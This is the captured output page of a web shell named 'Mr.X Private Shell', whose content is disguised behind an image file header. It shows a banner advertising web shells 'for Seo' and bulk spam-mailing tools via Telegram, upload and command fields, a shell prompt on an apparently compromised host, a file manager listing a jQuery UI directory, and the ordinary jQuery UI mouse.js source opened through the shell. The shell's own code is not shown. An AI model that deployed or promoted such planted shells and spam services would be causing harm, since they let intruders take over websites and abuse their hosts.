����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

bkunreyz@216.73.217.13: ~ $
/*!
 * jQuery UI Mouse 1.12.1
 * http://jqueryui.com
 *
 * Copyright jQuery Foundation and other contributors
 * Released under the MIT license.
 * http://jquery.org/license
 */

//>>label: Mouse
//>>group: Widgets
//>>description: Abstracts mouse-based interactions to assist in creating certain widgets.
//>>docs: http://api.jqueryui.com/mouse/

( function( factory ) {
	if ( typeof define === "function" && define.amd ) {

		// AMD. Register as an anonymous module.
		define( [
			"jquery",
			"./core"
		], factory );
	} else {

		// Browser globals
		factory( jQuery );
	}
}( function( $ ) {

var mouseHandled = false;
$( document ).on( "mouseup", function() {
	mouseHandled = false;
} );

return $.widget( "ui.mouse", {
	version: "1.12.1",
	options: {
		cancel: "input, textarea, button, select, option",
		distance: 1,
		delay: 0
	},
	_mouseInit: function() {
		var that = this;

		this.element
			.on( "mousedown." + this.widgetName, function( event ) {
				return that._mouseDown( event );
			} )
			.on( "click." + this.widgetName, function( event ) {
				if ( true === $.data( event.target, that.widgetName + ".preventClickEvent" ) ) {
					$.removeData( event.target, that.widgetName + ".preventClickEvent" );
					event.stopImmediatePropagation();
					return false;
				}
			} );

		this.started = false;
	},

	// TODO: make sure destroying one instance of mouse doesn't mess with
	// other instances of mouse
	_mouseDestroy: function() {
		this.element.off( "." + this.widgetName );
		if ( this._mouseMoveDelegate ) {
			this.document
				.off( "mousemove." + this.widgetName, this._mouseMoveDelegate )
				.off( "mouseup." + this.widgetName, this._mouseUpDelegate );
		}
	},

	_mouseDown: function( event ) {

		// don't let more than one widget handle mouseStart
		if ( mouseHandled ) {
			return;
		}

		this._mouseMoved = false;

		// We may have missed mouseup (out of window)
		( this._mouseStarted && this._mouseUp( event ) );

		this._mouseDownEvent = event;

		var that = this,
			btnIsLeft = ( event.which === 1 ),

			// event.target.nodeName works around a bug in IE 8 with
			// disabled inputs (#7620)
			elIsCancel = ( typeof this.options.cancel === "string" && event.target.nodeName ?
				$( event.target ).closest( this.options.cancel ).length : false );
		if ( !btnIsLeft || elIsCancel || !this._mouseCapture( event ) ) {
			return true;
		}

		this.mouseDelayMet = !this.options.delay;
		if ( !this.mouseDelayMet ) {
			this._mouseDelayTimer = setTimeout( function() {
				that.mouseDelayMet = true;
			}, this.options.delay );
		}

		if ( this._mouseDistanceMet( event ) && this._mouseDelayMet( event ) ) {
			this._mouseStarted = ( this._mouseStart( event ) !== false );
			if ( !this._mouseStarted ) {
				event.preventDefault();
				return true;
			}
		}

		// Click event may never have fired (Gecko & Opera)
		if ( true === $.data( event.target, this.widgetName + ".preventClickEvent" ) ) {
			$.removeData( event.target, this.widgetName + ".preventClickEvent" );
		}

		// These delegates are required to keep context
		this._mouseMoveDelegate = function( event ) {
			return that._mouseMove( event );
		};
		this._mouseUpDelegate = function( event ) {
			return that._mouseUp( event );
		};

		this.document
			.on( "mousemove." + this.widgetName, this._mouseMoveDelegate )
			.on( "mouseup." + this.widgetName, this._mouseUpDelegate );

		event.preventDefault();

		mouseHandled = true;
		return true;
	},

	_mouseMove: function( event ) {

		// Only check for mouseups outside the document if you've moved inside the document
		// at least once. This prevents the firing of mouseup in the case of IE<9, which will
		// fire a mousemove event if content is placed under the cursor. See #7778
		// Support: IE <9
		if ( this._mouseMoved ) {

			// IE mouseup check - mouseup happened when mouse was out of window
			if ( $.ui.ie && ( !document.documentMode || document.documentMode < 9 ) &&
					!event.button ) {
				return this._mouseUp( event );

			// Iframe mouseup check - mouseup occurred in another document
			} else if ( !event.which ) {

				// Support: Safari <=8 - 9
				// Safari sets which to 0 if you press any of the following keys
				// during a drag (#14461)
				if ( event.originalEvent.altKey || event.originalEvent.ctrlKey ||
						event.originalEvent.metaKey || event.originalEvent.shiftKey ) {
					this.ignoreMissingWhich = true;
				} else if ( !this.ignoreMissingWhich ) {
					return this._mouseUp( event );
				}
			}
		}

		if ( event.which || event.button ) {
			this._mouseMoved = true;
		}

		if ( this._mouseStarted ) {
			this._mouseDrag( event );
			return event.preventDefault();
		}

		if ( this._mouseDistanceMet( event ) && this._mouseDelayMet( event ) ) {
			this._mouseStarted =
				( this._mouseStart( this._mouseDownEvent, event ) !== false );
			( this._mouseStarted ? this._mouseDrag( event ) : this._mouseUp( event ) );
		}

		return !this._mouseStarted;
	},

	_mouseUp: function( event ) {
		this.document
			.off( "mousemove." + this.widgetName, this._mouseMoveDelegate )
			.off( "mouseup." + this.widgetName, this._mouseUpDelegate );

		if ( this._mouseStarted ) {
			this._mouseStarted = false;

			if ( event.target === this._mouseDownEvent.target ) {
				$.data( event.target, this.widgetName + ".preventClickEvent", true );
			}

			this._mouseStop( event );
		}

		if ( this._mouseDelayTimer ) {
			clearTimeout( this._mouseDelayTimer );
			delete this._mouseDelayTimer;
		}

		this.ignoreMissingWhich = false;
		mouseHandled = false;
		event.preventDefault();
	},

	_mouseDistanceMet: function( event ) {
		return ( Math.max(
				Math.abs( this._mouseDownEvent.pageX - event.pageX ),
				Math.abs( this._mouseDownEvent.pageY - event.pageY )
			) >= this.options.distance
		);
	},

	_mouseDelayMet: function( /* event */ ) {
		return this.mouseDelayMet;
	},

	// These are placeholder methods, to be overriden by extending plugin
	_mouseStart: function( /* event */ ) {},
	_mouseDrag: function( /* event */ ) {},
	_mouseStop: function( /* event */ ) {},
	_mouseCapture: function( /* event */ ) { return true; }
} );

} ) );

Filemanager

Name Type Size Permission Actions
accordion.js File 15.49 KB 0644
accordion.min.js File 8.46 KB 0644
autocomplete.js File 17.19 KB 0644
autocomplete.min.js File 8.34 KB 0644
button.js File 9.74 KB 0644
button.min.js File 5.44 KB 0644
checkboxradio.js File 7.33 KB 0644
checkboxradio.min.js File 4.27 KB 0644
controlgroup.js File 8.36 KB 0644
controlgroup.min.js File 4.26 KB 0644
core.js File 47.81 KB 0644
core.min.js File 20.3 KB 0644
datepicker.js File 78.88 KB 0644
datepicker.min.js File 35.3 KB 0644
dialog.js File 22.51 KB 0644
dialog.min.js File 12.48 KB 0644
draggable.js File 34.51 KB 0644
draggable.min.js File 17.86 KB 0644
droppable.js File 12.52 KB 0644
droppable.min.js File 6.43 KB 0644
effect-blind.js File 1.55 KB 0644
effect-blind.min.js File 838 B 0644
effect-bounce.js File 2.55 KB 0644
effect-bounce.min.js File 949 B 0644
effect-clip.js File 1.49 KB 0644
effect-clip.min.js File 754 B 0644
effect-drop.js File 1.51 KB 0644
effect-drop.min.js File 709 B 0644
effect-explode.js File 2.81 KB 0644
effect-explode.min.js File 1.05 KB 0644
effect-fade.js File 916 B 0644
effect-fade.min.js File 483 B 0644
effect-fold.js File 2.08 KB 0644
effect-fold.min.js File 978 B 0644
effect-highlight.js File 1.16 KB 0644
effect-highlight.min.js File 606 B 0644
effect-puff.js File 943 B 0644
effect-puff.min.js File 468 B 0644
effect-pulsate.js File 1.48 KB 0644
effect-pulsate.min.js File 646 B 0644
effect-scale.js File 1.29 KB 0644
effect-scale.min.js File 681 B 0644
effect-shake.js File 1.79 KB 0644
effect-shake.min.js File 804 B 0644
effect-size.js File 5.19 KB 0644
effect-size.min.js File 2.35 KB 0644
effect-slide.js File 1.87 KB 0644
effect-slide.min.js File 875 B 0644
effect-transfer.js File 836 B 0644
effect-transfer.min.js File 400 B 0644
effect.js File 39.89 KB 0644
effect.min.js File 16.52 KB 0644
menu.js File 17.36 KB 0644
menu.min.js File 9.31 KB 0644
mouse.js File 5.98 KB 0644
mouse.min.js File 3.3 KB 0644
progressbar.js File 4.1 KB 0644
progressbar.min.js File 2.46 KB 0644
resizable.js File 29.22 KB 0644
resizable.min.js File 18.04 KB 0644
selectable.js File 7.88 KB 0644
selectable.min.js File 4.35 KB 0644
selectmenu.js File 15.68 KB 0644
selectmenu.min.js File 9.08 KB 0644
slider.js File 19.06 KB 0644
slider.min.js File 10.46 KB 0644
sortable.js File 44.95 KB 0644
sortable.min.js File 24.2 KB 0644
spinner.js File 13.85 KB 0644
spinner.min.js File 7.36 KB 0644
tabs.js File 23 KB 0644
tabs.min.js File 11.64 KB 0644
tooltip.js File 13.95 KB 0644
tooltip.min.js File 5.95 KB 0644